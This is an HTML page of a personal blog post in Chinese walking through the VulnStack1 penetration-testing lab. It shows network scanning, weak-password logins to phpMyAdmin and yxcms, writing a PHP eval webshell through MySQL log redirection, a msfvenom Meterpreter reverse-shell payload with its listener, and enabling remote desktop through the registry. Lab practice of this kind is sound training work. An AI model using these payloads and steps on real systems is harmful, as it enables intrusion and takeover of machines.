

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;light&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" type="image/png" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="Na0H_1e3">
  <meta name="keywords" content="Na0H1e3,blog,博客,web,ctf,渗透">
  <title>VulnStack1 - Na0H的神光棒存放地</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.4.0/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"na0hblog.top","root":"/","version":"1.8.7","typing":{"enable":true,"typeSpeed":70,"cursorChar":"🐳_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"onlypost":false},"web_analytics":{"enable":true,"baidu":null,"google":"G-MLL1PZ9RBK","gtag":260676474,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":"zjCV2oT3ti8Lyk0insYTRpLr-gzGzoHsz","app_key":"y4AXlgIqQsV7Enr3IFS3r6Ck","server_url":"https://zjcv2ot3.lc-cn-n1-shared.com"}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.3.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>Na0H的神光棒存放地</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/textbg.jpg') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="VulnStack1">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-03-10 21:51" pubdate>
        2021年3月10日 晚上
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      1.8k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      21
       分钟
    </span>
  

  
  
    
      <!-- LeanCloud 统计文章PV -->
      <span id="leancloud-page-views-container" class="post-meta" style="display: none">
        <i class="iconfont icon-eye" aria-hidden="true"></i>
        <span id="leancloud-page-views"></span> 次
      </span>
    
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">VulnStack1</h1>
            
              <p class="note note-info">
                
                  本文最后更新于：2021年4月7日 上午
                
              </p>
            
            <div class="markdown-body">
              <!-- more -->

<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>最近有些迷茫，就只是单纯的刷web题和写一下python脚本，渗透方面倒是没啥长进<br>就打算做一下这些靶场，也了解一下内网</p>
<h1 id="环境安装及配置"><a href="#环境安装及配置" class="headerlink" title="环境安装及配置"></a>环境安装及配置</h1><p><img src="https://i.loli.net/2021/03/18/W37ZjQGTCcnim8P.png" srcset="/img/loading.gif"></p>
<table>
<thead>
<tr>
<th align="center">名称</th>
<th align="center">ip</th>
<th align="center">说明</th>
</tr>
</thead>
<tbody><tr>
<td align="center">kali</td>
<td align="center">192.168.244.129</td>
<td align="center">攻击机</td>
</tr>
<tr>
<td align="center">win7</td>
<td align="center">192.168.244.134</td>
<td align="center">VM1：web服务器</td>
</tr>
<tr>
<td align="center">win2k3</td>
<td align="center">192.168.52.141</td>
<td align="center">VM2：域成员</td>
</tr>
<tr>
<td align="center">win2008</td>
<td align="center">192.168.52.138</td>
<td align="center">VM3：域控服务器</td>
</tr>
</tbody></table>
<p>用的是VMware，将三个虚拟机的压缩包解压，然后VM扫描虚拟机就快速导入了</p>
<p>关键是网络的配置：</p>
<p>攻击机kali网卡设置为：<code>VMnet8(NAT模式)</code></p>
<p>VM1(Win7)添加一块网卡，分别设置为：<code>VMnet1(仅主机模式)</code>、<code>VMnet8(NAT模式)</code><br>VM2(Win2003)网卡设置为：<code>VMnet1(仅主机模式)</code><br>VM2(Win2008)网卡设置为：<code>VMnet1(仅主机模式)</code><br><img src="https://i.loli.net/2021/03/18/JCS5pvBgq12w3Pr.png" srcset="/img/loading.gif"></p>
<p>开机要求输入密码为：<code>hongrisec@2019</code>，可能提示要修改密码，必须有符合、字母和数字<br>（ps：提示按ctrl+alt+del才能进入登陆框，但这样物理机也会弹出任务管理，因此在vm中按ctrl+alt+ins就可以了）</p>
<h2 id="系统任务栏图标透明、无法打开"><a href="#系统任务栏图标透明、无法打开" class="headerlink" title="系统任务栏图标透明、无法打开"></a>系统任务栏图标透明、无法打开</h2><p>然后就是打开win7的phpstudy了，但在这里踩坑了，运行时phpstudy由于无法创建任务栏图标崩溃了–<br>搞了一个多钟差点整破防，后来用度娘一搜就出来==，是真的难受</p>
<p><strong>解决办法：</strong></p>
<ol>
<li>win+r输入<code>regedit</code>打开注册表</li>
<li>依次找到<br>HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify</li>
<li>清空<code>IconStreams</code>和<code>PastIconsStream</code>的值（右键全选、删除|剪切，保存即可）</li>
<li>重启explorer.exe：打开任务管理器，在进程一栏关闭explorer.exe；然后创建新任务：explorer.exe</li>
</ol>
<h2 id="kali安装蚁剑"><a href="#kali安装蚁剑" class="headerlink" title="kali安装蚁剑"></a>kali安装蚁剑</h2><p>因为ip配置的问题，物理机没连局域网，想想还是直接在kali装个蚁剑吧</p>
<p><a target="_blank" rel="noopener" href="https://github.com/AntSwordProject/AntSword-Loader">AntSwordProject/AntSword-Loader: AntSword 加载器 (github.com)</a><br><img src="https://i.loli.net/2021/03/18/pWmcRr9QXUb58DN.png" srcset="/img/loading.gif"><br>下载完之后找地方解压，然后进入解压后的目录<br><img src="https://i.loli.net/2021/03/18/1g53vqC8aHDObEG.png" srcset="/img/loading.gif"></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta">#</span><span class="bash"> 如果没有x权限就给AntSword加个执行权限</span><br>sudo chmod u+x AntSword<br><span class="hljs-meta">#</span><span class="bash"> 然后允许AntSword即可，需要一个具有写权限的初始化目录，按自己心情弄吧--</span><br>sudo mkdir antsword<br><span class="hljs-meta">#</span><span class="bash"> 运行！</span><br>./AntSword<br></code></pre></td></tr></table></figure>
<h1 id="外网渗透"><a href="#外网渗透" class="headerlink" title="外网渗透"></a>外网渗透</h1><h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><h3 id="主机发现"><a href="#主机发现" class="headerlink" title="主机发现"></a>主机发现</h3><p>咱们的攻击机kali ip是192.168.244，用nmap扫一下<code>nmap -sn 192.168.244.129/24</code><img src="https://i.loli.net/2021/03/18/SgKNX1AsWU6RIYF.png" srcset="/img/loading.gif"></p>
<p>可以看到扫出了win7的外网ip</p>
<h3 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h3><p>然后就是扫描主机的端口了，仍是nmap：<code>nmap -Pn -A 192.168.244.134</code></p>
<p>可以看到开放了80和3306端口，想到网站和mysql数据库</p>
<p><img src="https://i.loli.net/2021/03/18/WQKE1Z4gLvb9Pic.png" srcset="/img/loading.gif"></p>
<h2 id="漏洞挖掘"><a href="#漏洞挖掘" class="headerlink" title="漏洞挖掘"></a>漏洞挖掘</h2><p>接下来就是对外网进行渗透了，先访问一下ip，直接就是一个探针<br><img src="https://i.loli.net/2021/03/18/wmLz6QafxJu8KbU.png" srcset="/img/loading.gif"><br>先扫下目录吧，看看有啥好东西<br>这里没装脚本，就用一下kali自带的niktp：<code>nikto -h 192.168.244.134</code></p>
<p><img src="https://i.loli.net/2021/03/18/8B9Qj5ihOTYrKRL.png" srcset="/img/loading.gif"><br>可以看到扫到个phpmyadmin，常规密码、弱口令走一波<br>root、root登陆成功</p>
<p>版本为5.5.53，可惜看到的大部分漏洞都不包含这个版本<br><img src="https://i.loli.net/2021/03/18/cJT5hodMK3QYI8z.png" srcset="/img/loading.gif"></p>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><h3 id="PHPMyadmin后台getshell"><a href="#PHPMyadmin后台getshell" class="headerlink" title="PHPMyadmin后台getshell"></a>PHPMyadmin后台getshell</h3><h4 id="直接写入"><a href="#直接写入" class="headerlink" title="直接写入"></a>直接写入</h4><p>那么先试试之前学过的select into outfile|dumpfile 直接写shell</p>
<p>利用条件</p>
<ul>
<li>secure_file_priv没有具体值（不是NULL）<br>(NULL:限制mysql导入和导出；无具体值：不做限制；有值：只能在该值指定目录进行导入导出)</li>
<li>知道路径，具有写权限，可使用单引号<br>（ps：<code>magic_quotes_gpc</code>开启时，会对’单引号进行转义，使其变成“\”反斜杠）</li>
</ul>
<p>okk，那么就开始吧，利用<code>@@datadir</code>、<code>@@secure_file_priv</code>来看看这些值如何</p>
<p><img src="https://i.loli.net/2021/03/18/S5QiwoLa4WX6VG3.png" srcset="/img/loading.gif"><br>可惜的是secure_file_priv=NULL，那么此法就不可行了，正好学习其他方法</p>
<h4 id="利用日志文件getshell"><a href="#利用日志文件getshell" class="headerlink" title="利用日志文件getshell"></a>利用日志文件getshell</h4><p>前提：</p>
<ul>
<li>账号拥有<code>可读可写</code>权限</li>
<li><code>Mysql</code>版本大于<code>5.0</code>，在5.0版本以上mysql会创建日志文件，通过改变全局变量控制日志文件的生成从而getshell</li>
</ul>
<h5 id="开启全局日志getshell"><a href="#开启全局日志getshell" class="headerlink" title="开启全局日志getshell"></a>开启全局日志getshell</h5><ul>
<li><p>步骤：</p>
<ul>
<li>查看general_log和general_log_file：<code>show variables like &#39;%general%&#39;;</code></li>
<li>开启general log模式：<code>set global general_log = on;</code></li>
<li>设置日志目录为shell写入路径：<code>set global general_log_file = &#39;C:/phpStudy/WWW/hhh.php&#39;;</code></li>
<li>写入shell：<code>select &#39;&lt;?php eval($_POST[hhh]);?&gt;&#39;</code></li>
</ul>
</li>
</ul>
<p><u>实操一波</u>：</p>
<p>ps：同样的这样查也可以(如下general_log就没打开)</p>
<p><img src="https://i.loli.net/2021/03/18/wTXqm26oaebGBhL.png" srcset="/img/loading.gif"><br>那么就按步骤一步步来吧：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs mysql">set global general_log &#x3D; on;<br>set global general_log_file &#x3D; &#39;C:&#x2F;phpStudy&#x2F;WWW&#x2F;hhh.php&#39;;<br>select @@general_log,@@general_log_file,@@datadir;<br></code></pre></td></tr></table></figure>
<p>okk，全局日志以及路径都设置好了，接下来就是写shell了</p>
<p>（ps：这里的www路径可以在探针里看，也可以利用@@datadir爆出phpstudy路径，然后根据默认路径找到www）<br><img src="https://i.loli.net/2021/03/18/8x9qDXUIEwoNbVT.png" srcset="/img/loading.gif"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs mysql">select &#39;&lt;?php eval($_POST[hhh]);?&gt;&#39;<br></code></pre></td></tr></table></figure>
<p><img src="https://i.loli.net/2021/03/18/qfaN7S8PvFMn5yc.png" srcset="/img/loading.gif"></p>
<p>文件内容如下，就是一个存储命令和状态的日志<br><img src="https://i.loli.net/2021/03/18/KtlRNa18eAsyBc7.png" srcset="/img/loading.gif"></p>
<p>蚁剑连接即可：</p>
<p><img src="https://i.loli.net/2021/03/18/xRuFK9zbdq4Zs6j.png" srcset="/img/loading.gif"></p>
<h5 id="使用慢查询日志getshell"><a href="#使用慢查询日志getshell" class="headerlink" title="使用慢查询日志getshell"></a>使用慢查询日志getshell</h5><ul>
<li>慢查询日志：<br>记录所有执行时间超过long_query_time秒的所有查询或者不使用索引的查询。默认情况下，MySQL数据库是不开启慢查询日志的，long_query_time的默认值为10（即10秒，通常设置为1秒），即运行10秒以上的语句是慢查询语句<br>（ps：和全局日志一样都是讲恶意语句写入日志中，只是二者记录的条件不同）</li>
<li>步骤：<ul>
<li>查看相关参数：<code>show variables like &#39;%slow%&#39;;</code></li>
<li>启用慢查询日志，并修改路径：<br><code>set global slow_query_log_file = &#39;C:/phpStudy/WWW/hhh2.php&#39;;</code><br><code>set GLOBAL slow_query_log=on;</code></li>
<li>写入shell：<code>select &#39;&lt;?php eval($_POST[hhh]);?&gt;&#39; from mysql.db where sleep(10);</code></li>
</ul>
</li>
</ul>
<p><img src="https://i.loli.net/2021/03/18/57lRmE3kZtqGo8A.png" srcset="/img/loading.gif"><br><img src="https://i.loli.net/2021/03/18/jDBZV9ymuG6r37c.png" srcset="/img/loading.gif">j</p>
<p>看一下www目录下还有个yxcms，em看了这里也可以getshell，那么就来看一下吧</p>
<h3 id="yxcms"><a href="#yxcms" class="headerlink" title="yxcms"></a>yxcms</h3><p>搜了一下相关漏洞，后台getshell好像更容易一些<br>后台路径：<code>ip/yxcms/index.php?r=admin</code>,弱口令一下：admin、123456直接登入了<br>（说起来学校也是好多弱口令）</p>
<p>在后台里可以直接 新建 | 修改文件内容，那么直接上马，连接即可</p>
<p><img src="https://i.loli.net/2021/03/18/N21VQTJFhci98kO.png" srcset="/img/loading.gif"></p>
<p>外网大概就是到这里0。0，内网还在研究</p>
<h1 id="对拿到的主机进行信息收集"><a href="#对拿到的主机进行信息收集" class="headerlink" title="对拿到的主机进行信息收集"></a>对拿到的主机进行信息收集</h1><figure class="highlight gauss"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs gauss">whoami					<span class="hljs-meta"># 查看权限；用户为god；权限为administrator</span><br>ipconfig				<span class="hljs-meta"># 看网卡</span><br>net config Workstation	<span class="hljs-meta"># 查看当前登录域及登录用户信息</span><br>net <span class="hljs-built_in">view</span> /domain:god	<span class="hljs-meta"># 查看域成员</span><br></code></pre></td></tr></table></figure>
<p>然后是利用msf和cs:<br>msf生成一个payload上传到win7并执行，得到msf的session（也可以用cs生成）</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta">#</span><span class="bash"> 这里的IP是攻击机也就是kali的ip，端口则是监听的端口：</span><br>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=6666 -f exe -o hhh.exe<br><span class="hljs-meta">#</span><span class="bash"> 生成完毕给他777权限：</span><br>chmod 777 hhh.exe<br></code></pre></td></tr></table></figure>
<p><img src="https://i.loli.net/2021/04/07/sIcoH1ZxDtWFORq.png" srcset="/img/loading.gif" alt="把他上传到win7"></p>
<p>然后在msf接收这个反弹shell：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs shell">msfconsole<br>use exploit/multi/handler     							# 进入模块<br>set payload windows/x64/meterpreter_reverse_tcp		   	# 设置payload模块<br>set payload windows/meterpreter/reverse_tcp     		#（上一个payload有问题，我们用这个）<br>set lhost 192.168.244.128     							# 设置kali的地址<br>set lport 6666        									# 设置监听的端口<br></code></pre></td></tr></table></figure>
<p><img src="https://i.loli.net/2021/04/07/FmK9x4pGSjhtv2e.png" srcset="/img/loading.gif"></p>
<p>然后在win7执行hhh.exe就可以拿到反弹shell了</p>
<p><img src="https://i.loli.net/2021/04/07/mDq8K1uaRjpzTFy.png" srcset="/img/loading.gif"><br><a target="_blank" rel="noopener" href="https://www.mrwu.red/web/2674.html">msf后渗透利用命令|MrWu</a></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta">#</span><span class="bash"> 也在shell里先打开3389端口，再远程连接：</span><br>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal&quot; &quot;Server /v fDenyTSConnections /t REG_DWORD /d 0 /f				 # 开启3389<br>netstat -ano |findstr 3389	 	# 查看端口是否打开<br><span class="hljs-meta">#</span><span class="bash"> 不过用这个方法再使用kali的rdesktop连接失败了--，大概是存在waf，还是回头使用ms好f了</span><br>exploit -j						# 把msf挂在后台运行<br>run getgui -e    				# msf开启远程桌面<br><span class="hljs-meta">#</span><span class="bash"> 远程连接！00</span><br>rdesktop 192.168.244.134<br></code></pre></td></tr></table></figure>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/VulStack/">VulStack</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/VulnStack/">VulnStack</a>
                    
                      <a class="hover-with-bg" href="/tags/%E6%B8%97%E9%80%8F/">渗透</a>
                    
                      <a class="hover-with-bg" href="/tags/%E5%86%85%E7%BD%91/">内网</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！</p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2021/04/06/web%E7%9F%A5%E8%AF%86%E5%B0%8F%E8%AE%B0/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">web知识小记（长期更|大概）</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/03/09/%E9%9A%8F%E4%BE%BF%E6%B3%A8blacklist%E5%BE%97%E5%88%B0%E7%9A%84%E4%B8%80%E4%BA%9B%E7%9F%A5%E8%AF%86/">
                        <span class="hidden-mobile">随便注|blacklist => 的一些知识</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments">
                
                
  <div id="vcomments"></div>
  <script type="text/javascript">
    Fluid.utils.waitElementVisible('vcomments', function() {
      Fluid.utils.createScript('https://cdn.jsdelivr.net/npm/valine@1.4.14/dist/Valine.min.js', function () {
        new Valine({
          el: "#vcomments",
          app_id: "zjCV2oT3ti8Lyk0insYTRpLr-gzGzoHsz",
          app_key: "y4AXlgIqQsV7Enr3IFS3r6Ck",
          placeholder: "欢迎评论噢~",
          path: window.location.pathname,
          avatar: "retro",
          meta: ["nick","mail","link"],
          pageSize: "10",
          lang: "zh-CN",
          highlight: true,
          recordIP: false,
          serverURLs: "",
        });
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the
    <a target="_blank" href="https://valine.js.org" rel="nofollow noopener noopener">comments powered by Valine.</a>
  </noscript>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>


  
  <div class="statistics">
    
    

    
      
        <!-- LeanCloud 统计PV -->
        <span id="leancloud-site-pv-container" style="display: none">
            总访问量 
            <span id="leancloud-site-pv"></span>
             次
          </span>
      
      
        <!-- LeanCloud 统计UV -->
        <span id="leancloud-site-uv-container" style="display: none">
            总访客数 
            <span id="leancloud-site-uv"></span>
             人
          </span>
      

    
  </div>


  

  

<span id="sitetime"></span>
<script language=javascript>
	function siteTime(){
		window.setTimeout("siteTime()", 1000);
		var seconds = 1000;
		var minutes = seconds * 60;
		var hours = minutes * 60;
		var days = hours * 24;
		var years = days * 365;
		var today = new Date();
		var todayYear = today.getFullYear();
		var todayMonth = today.getMonth()+1;
		var todayDate = today.getDate();
		var todayHour = today.getHours();
		var todayMinute = today.getMinutes();
		var todaySecond = today.getSeconds();
		/* 
		Date.UTC() -- 返回date对象距世界标准时间(UTC)1970年1月1日午夜之间的毫秒数(时间戳)
		year - 作为date对象的年份，为4位年份值
		month - 0-11之间的整数，做为date对象的月份
		day - 1-31之间的整数，做为date对象的天数
		hours - 0(午夜24点)-23之间的整数，做为date对象的小时数
		minutes - 0-59之间的整数，做为date对象的分钟数
		seconds - 0-59之间的整数，做为date对象的秒数
		microseconds - 0-999之间的整数，做为date对象的毫秒数
        */
		var t1 = Date.UTC(2020,12,30,00,00,00); //北京时间2020-12-30 00:00:00
		var t2 = Date.UTC(todayYear,todayMonth,todayDate,todayHour,todayMinute,todaySecond);
		var diff = t2-t1;
		var diffYears = Math.floor(diff/years);
		var diffDays = Math.floor((diff/days)-diffYears*365);
		var diffHours = Math.floor((diff-(diffYears*365+diffDays)*days)/hours);
		var diffMinutes = Math.floor((diff-(diffYears*365+diffDays)*days-diffHours*hours)/minutes);
		var diffSeconds = Math.floor((diff-(diffYears*365+diffDays)*days-diffHours*hours-diffMinutes*minutes)/seconds);
		document.getElementById("sitetime").innerHTML=" 自Na0h将神光棒放入此地已"+/*diffYears+" 年 "+*/diffDays+" 天"+diffHours+" 小时 "+diffMinutes+" 分钟 "+diffSeconds+" 秒🌩٩(๏̯๏)۶❤ ";
	}
	siteTime();
</script>


</footer>


<!-- SCRIPTS -->

  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.0/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.6/dist/clipboard.min.js" ></script>




  <script defer src="/js/leancloud.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.11/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      var inputArea = document.querySelector("#local-search-input");
      inputArea.onclick = function () {
        searchFunc(path, 'local-search-input', 'local-search-result');
        this.onclick = null
      }
    })()
  </script>












  

  
    <!-- Google Analytics -->
    <script defer>
      window.ga = window.ga || function () { (ga.q = ga.q || []).push(arguments) };
      ga.l = +new Date;
      ga('create', 'G-MLL1PZ9RBK', 'auto');
      ga('send', 'pageview');
    </script>
    <script async src='https://www.google-analytics.com/analytics.js'></script>
  

  
    <!-- Google gtag.js -->
    <script async src="https://www.googletagmanager.com/gtag/js?id=260676474"></script>
    <script defer>
        window.dataLayer = window.dataLayer || [];
        function gtag(){dataLayer.push(arguments);}
        gtag('js', new Date());
        gtag('config', '260676474');
    </script>
  

  

  

  





<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>






<script type="text/javascript"
color="220,220,220" opacity='0.7' zIndex="-2" count="200" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js">
</script>

</body>
</html>
